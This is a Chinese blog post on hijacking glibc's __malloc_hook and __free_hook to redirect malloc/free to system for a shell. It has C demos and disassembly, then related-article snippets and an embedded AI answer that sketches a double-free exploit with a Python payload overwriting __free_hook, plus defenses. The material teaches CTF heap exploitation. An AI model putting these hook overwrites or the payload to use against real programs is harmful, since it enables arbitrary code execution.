__malloc_hook和__free_hook劫持原理

已于 2023-03-20 21:12:24 修改
阅读量1.8k 收藏 8
点赞数 2
文章标签: ubuntu 安全 网络 c语言 python
于 2023-03-20 19:36:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_69107736/article/details/129674212
版权
文章详细介绍了glibc库中__malloc_hook和__free_hook的劫持原理,以及在不同版本glibc中这些钩子函数的变化。通过示例代码展示了如何设置malloc和free的钩子,利用它们可以实现系统调用的拦截,如将__malloc_hook指向system函数,从而在分配内存时执行自定义命令。同时,文章提到了在新版本glibc中这些功能可能的移除和兼容性问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

__malloc_hook和__free_hook劫持原理

Hook即钩子,截获API调用的技术,是将执行流程劫持到你自己的代码。

刚开始在Ubuntu22上做实验,一直不成功,又换了kali,还是不行,最后发现__free_hook,__malloc_hook,__realloc_hook,_memalign_hook,_after_morecore_hookg在libc-2.34的patch中被移除了,换了Ubuntu16 libc版本2.23,但是发现只是在ld链接时会找不到definition,也就是无法通过链接的环节,但是在libc库里还是有的,可能是考虑之前使用hook程序的兼容。

grxer@Ubuntu16:/usr/include$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

malloc free

先看一下malloc和free函数具体调用

#include <stdio.h>
#include <malloc.h>
int main() {
  void *x=malloc(8); 
  free(x);
  return 0;
}

malloc

在这里插入图片描述

由于版本不一样__malloc_hook在main_arena的上方偏移是不确定的,这里可以看到在malloc时会从取出__malloc_hook的值进行test,不为0则跳转,为0则继续malloc,这里采用了rip的寻址方式,很6,不利于我们分析,看静态汇编吧

在这里插入图片描述

不为0跳转到,为0直接get_free_list去fastbins找free chunk了( glibc 2.26才引入tcache)

在这里插入图片描述

最后jmp到malloc_hook地址函数里,同时rdi的参数也未变,如果我们把hook改为system地址,那么只要在malloc时填入binsh地址就可以getshell

free同理

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

free hook不同的是采用了call的形式转移pc

malloc hook

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include <malloc.h>
int main()
{
    __malloc_hook =system;
    char str[10]="/bin/sh";
	char *s = malloc(str);	
    return 0;
}
//gcc -g -o malloc_hook malloc_hook.c

在这里插入图片描述

在这里插入图片描述

.text:000000000041F220                               malloc_hook_ini proc near               ; CODE XREF: calloc+2C8↑p
.text:000000000041F220                                                                       ; DATA XREF: .data:__malloc_hook↓o
.text:000000000041F220                               ; __unwind {
.text:000000000041F220 55                            push    rbp
.text:000000000041F221 53                            push    rbx
.text:000000000041F222 48 89 FD                      mov     rbp, rdi
.text:000000000041F225 48 83 EC 08                   sub     rsp, 8
.text:000000000041F229 8B 05 35 B5 2A 00             mov     eax, cs:__libc_malloc_initialized
.text:000000000041F22F 48 C7 05 4E B5 2A 00 00 00 00+mov     cs:__malloc_hook, 0
.text:000000000041F22F 00
.text:000000000041F23A 85 C0                         test    eax, eax

这时候我们发现malloc_hook并没有为0,而是malloc_hook_ini,会在mov cs:__malloc_hook, 0 置为0

在这里插入图片描述

在这里插入图片描述

free hook同理

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include <malloc.h>
int main()
{
    char *str = malloc(160);
	strcpy(str,"/bin/sh");
	
	printf("__free_hook: 0x%016X\n",__free_hook);
	__free_hook = system;
	free(str);
	return 0;
}
//gcc -g -o free_hook free_hook.c

在这里插入图片描述

在这里插入图片描述

Grxer
关注
劫持linux系统函数 malloc free linux打桩hooking
万有文的博客
04-24 1645
在Linux中,“打桩”(stubbing)或"钩子"(hooking)是一种修改程序行为的技术,通常用于测试、调试或功能增强。对于mallocfree这样的函数,打桩通常用于追踪内存分配释放情况,或用于在内存管理中加入额外的逻辑。
pwn中堆利用的姿势收集仓(持续补充中,用到什么记录什么)
Assassin
04-17 685
文章目录一、malloc hook(一)初级利用(二)程序中有/bin/sh字符串的利用方法(三)更常见的情景,利用realloc函数调整栈结构(四)例题二、free hook 很好的参考资料: pwn题堆利用的一些姿势 – malloc_hook 一、malloc hook 使用malloc hook主要是应对保护全开的时候,因为got表无法劫持,所以使用malloc hoook + onegadget来实现 (一)初级利用 malloc_hook是在malloc函数调用前会执行的钩子函数。 在程序中,
namebook
钞sir的博客
03-06 3765
检查机制: sir@sir-PC:~/desktop$ checksec name [*] '/home/sir/desktop/name' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (...
MALLOC_HOOK
RToax
01-29 1633
NAME        __malloc_hook, __malloc_initialize_hook, __memalign_hook, __free_hook, __realloc_hook, __after_morecore_hook - malloc debugging variables SYNOPSIS     ...
malloc 钩子
zz728的专栏
05-15 991
mem.h [cpp] view plaincopyprint? #ifndef __MEM_H__   #define __MEM_H__     #include    #include      static void *(*old_malloc_hook)(size_t, const void*);  static void *(*old_realloc_h
malloc_hook 研究.
hjjdebug的专栏
04-07 3204
研究了一下__malloc_hook, 你可以用man __malloc_hook 获取它的第一认识. 原来它是glibc 定义的一组变量(函数指针), 由此而去调用对应的函数, 这就叫hook. 把这个hook 定义到哪里,它就会调用到哪里,于是就理解了这个hook, 下面给出 一个完成的示例加深理解, 是参考手册写出的代码,调试通过. 可以理解为也是一种代码注入手段. 用以检查内存泄露等! 源码: cat main.cpp #include <stdio.h> #include
malloc hook初探
zz460833359的博客
12-21 1172
在程序中设置钩子,用来在malloc, realloc,free的时候,对其进行检查,可以看到对应的函数调用后的地址是什么。这个有时候可以用在debug的时候使用。 几个变量 __malloc_hook 这是一个函数指针变量,指向的是: void * function(size_t size, void * caller) 其中caller是表示在栈中调用malloc的函数的时候的函数地址,%p可以打印出他的地址。 __free_hook 同样这个也是一个函数指针变量,指向的是:
【我的 PWN 学习手札】malloc_init_state attack
Mr_Fmnwon的博客
10-24 1055
malloc_consolidate 会根据 global_max_fast 是否为 0 来判断 ptmalloc 是否已经初始化,因此如果能 通过任意地址写将 global_max_fast 置 0 然后触发 malloc_consolidate 就可以调用 malloc_init_state。
快速入门堆溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 694
OFF BY ONE 所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节 并且堆块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在堆块的bins中分为fastbins,largebins,smallbins还有今天要用
【PWN · heap | Arbitrary Alloc】2015_9447ctf_search-engine
Mr_Fmnwon的博客
02-10 925
Arbitrary Alloc 其实与 Alloc to stack 是完全相同的,唯一的区别是分配的目标不再是栈中。事实上只要满足目标地址存在合法的 size 域(这个 size 域是构造的,还是自然存在的都无妨),我们可以把 chunk 分配到任意的可写内存中,比如 bss、heap、data、stack 等等。Arbitrary Alloc 在 CTF 中用地更加频繁。我们可以利用字节错位等方法来绕过 size 域的检验,实现任意地址分配 chunk,最后的效果也就相当于任意地址写任意值。
通过劫持系统函数mallocfree实现实时检测内存防泄漏(初级)
SteveRocket's-Blog
08-18 941
int i = 0; void * mymalloc(size_t _Size) { i++; void *p = malloc(_Size); return p; } void myfree(void * _Memory) { i--; free(_Memory); } //内存防泄漏 通过劫持系统的mallocfree函数实现 检测内存泄露 void main() {
fastbin attack攻击中关于 malloc__hook
半岛铁盒的博客
07-20 655
概述 在程序中设置钩子,用来在malloc,,对其进行检查,可以看到对应的函数调用后的地址是什么。 malloc__hook 也位于libc中的data段 它是一个地址 当调用 malloc 的时候 它会发生跳转到malloc__hook 所指向的地址 当我们把malloc__hook 所指向的地址 改为 system(“bin/sh”) 再次调用 malloc 的时候 就会发生跳转到 system() 处 操作 上述前提是获取 malloc__hook 的地址 有一个固定的偏移 (libc2.23 //
GLiBC的malloc hook
weixin_33840661的博客
03-31 424
刚看了一个大牛的博客,介绍了一下glibc的“内存泄漏”的定位过程,觉得对今后实际碰到的问题有一定的参考作用,故在此复述一下,供自己今后参考。 问题重现:使用glibc下的malloc分配内存10G,后调用free后,发现进程的内存还是占用10G,有时候占用8G,有时候占用3G,不太稳定,有内存泄漏的嫌疑 于是开始经过长时间苦逼的定位过程,发现了glibc一个有趣的特性...
爆破malloc_hook -攻防世界 noleak
csdn546229768的博客
12-09 598
例题:攻防世界noleak 首先在不用unsort bin的情况下进行攻击,那么我们怎么拿到__malloc_hook的地址呢? 攻击思路:将shellcode放入程序的bss段(0x601020)通过__malloc_hook执行bss中的shellcode,为什么需要爆破呢, 因为我们实际上是获取不到 maloc_hook的地址的只是将它写入到了一个地址处,然后通过fast bin attact 攻击,因为fast bin的fake chunk需要检查size位,既然创造size位,那么libc-2-2
malloc hook进行内存泄漏检测
bocai1215的博客
04-14 988
CMakeLists.txt相应的memory_leak.cpp文件。记录下使用mallochook形式,写个小的demo,并记录遇到的问题。
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 5882
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护Full RELRO,NX保护栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
内存分配钩子__malloc_hook, __reallac_hook, __free_hook的使用
鬼手
08-26 4982
mem.h #ifndef __MEM_H__ #define __MEM_H__ #include #include static void *(*old_malloc_hook)(size_t, const void*); static void *(*old_realloc_hook)(void *ptr, size_t size, const void *caller); sta
日常知识点之内存泄露定位手段(c语言hook malloc相关方式)
yun6853992的博客
01-16 3911
日常闲听公开课,又是自己不会的一个知识点,做笔记整理: 如何确定有内存泄露问题,如何定位到内存泄露位置,如何写一个内存泄漏检测工具? 1:概述 内存泄露本质:其实就是申请调用malloc/new,但是释放调用free/delete有遗漏,或者重复释放的问题。 内存泄露会导致的现象:作为一个服务器,长时间运行,内存泄露会导致进程虚拟内存被占用完,导致进程崩溃吧。(堆上分配的内存) 如何规避或者发现内存泄露呢? ===》1:如何检测有内存泄露?(除了内存监控工具htop,耗时,效果不明显) ===》2:如何定位
PWN double free
最新发布
03-21
<think>好的,我现在需要回答用户关于PWN中double free漏洞的利用方法防御措施的问题。首先,我需要回忆一下double free的基本概念。Double free指的是在程序中多次释放同一块内存,这可能导致内存管理数据结构的破坏,进而被攻击者利用。 根据引用[1]中提到,常规题目中主函数可能存在触发shell的条件,但free函数对UAF(Use After Freedouble free(df)有防御措施,无法直接突破。然而,edit函数存在漏洞,允许控制写入字节,导致overlapping攻击。这说明即使有防御,如果其他函数存在漏洞,仍可能被利用。 接下来,引用[2]指出,double free原语几乎无懈可击,但UAF或溢出类漏洞需要精确修改结构体中的特定位置值。如果攻击者能控制写入的位置内容,就能绕过防御,比如修改chunk的指针,构造任意地址读写。 然后,引用[3]关于堆风水的部分提到,堆排布是堆漏洞利用的关键,需要熟悉glibc的内存管理策略。破坏堆内存管理的数据结构如bin或chunk,可以导致任意内存读写或控制流劫持。防御方法包括Heap Canary、CFI、ASLR等。 现在,结合这些信息,我需要整理利用double free的步骤。首先,触发double free,连续释放同一chunk两次,这会使得bin链表出现循环。接着,通过堆排布,重新分配这些chunk,并利用edit函数修改fd或bk指针,指向伪造的chunk。然后,分配伪造的chunk,实现任意地址写,比如修改GOT表或函数指针,最后劫持控制流执行shellcode或ROP链。 防御措施方面,引用[2][3]提到,glibc的改进如tcache double free检测,在释放时会检查chunk是否已在链表中。此外,Heap Canary可以检测堆溢出,ASLRDEP增加利用难度。代码审计安全机制如CFI也能有效防御。 需要确保回答结构清晰,分点说明利用方法防御措施,并引用提供的资料。同时,按照用户要求,生成相关问题,例如利用步骤、防御技术、绕过方法等。</think>### PWN中double free漏洞的利用与防御分析 #### 1. Double Free漏洞原理 double free指对同一块堆内存进行多次释放,破坏glibc内存管理结构(如tcache或fastbin的链表),导致内存布局可控。例如,连续释放chunk A两次后,其fd指针可能形成循环链表,后续分配时可构造重叠的chunk,最终实现任意地址读写或控制流劫持[^2][^3]。 #### 2. 利用方法及步骤 **典型利用流程**: 1. **触发double free**:通过程序逻辑连续释放同一chunk两次,例如: ```c free(ptr); free(ptr); // 触发double free ``` 2. **堆排布(Heap Feng Shui)**:通过分配特定大小的chunk,控制内存布局,使后续分配的chunk覆盖关键数据。 3. **修改链表指针**:利用存在漏洞的`edit`函数修改chunk的`fd`或`bk`指针,指向伪造的chunk(如GOT表、`__free_hook`等)[^1]。 4. **分配伪造chunk**:通过`malloc`获取指向目标地址的指针,实现任意地址写入,例如修改`__free_hook`为`system`地址。 5. **触发执行流劫持**:调用`free`或相关函数时,跳转至攻击者控制的代码(如ROP链或shellcode)[^4]。 **示例场景**: 若程序允许写入释放后的chunk,攻击者可构造如下payload: ```python # 假设chunk大小为0x20 add(0x20, "A") # chunk A free(0) free(0) # double free edit(0, p64(libc_base + 0x1eeb28)) # 修改fd指针指向__free_hook add(0x20, "B") # 分配chunk A add(0x20, "/bin/sh") # 分配chunk A的fd指向位置(即__free_hook) add(0x20, p64(system_addr)) # 将__free_hook覆盖为system free("/bin/sh") # 触发system("/bin/sh") ``` #### 3. 防御措施 1. **glibc防护机制**: - **tcache double free检测**:glibc 2.29+在释放时会检查chunk是否已在tcache链表中。 - **fastbin完整性校验**:分配时验证`fd`指针是否指向合法内存区域。 2. **堆内存保护技术**: - **Heap Canary**:检测堆溢出对管理结构的破坏。 - **Safe-Linking**(glibc 2.32+):对链表指针进行异或加密,增加伪造难度。 3. **系统级防护**: - **ASLR**:随机化地址空间,增加定位目标的难度。 - **DEP**:阻止攻击者执行堆栈中的shellcode[^3]。 4. **代码审计**: - 严格检查`free`前后指针置空情况,避免悬垂指针。 - 限制用户对chunk内容的写入范围权限。 #### 4. 绕过防御的常见方法 - **利用其他漏洞组合**:若存在堆溢出或UAF,可覆盖`key`字段(tcache的double free检测标志)。 - **构造特定内存布局**:通过大量分配/释放操作,使伪造的chunk通过glibc的完整性检查。 - **劫持控制流的替代目标**:若`__free_hook`被保护,可转向修改`_IO_FILE`结构体或ROP链[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值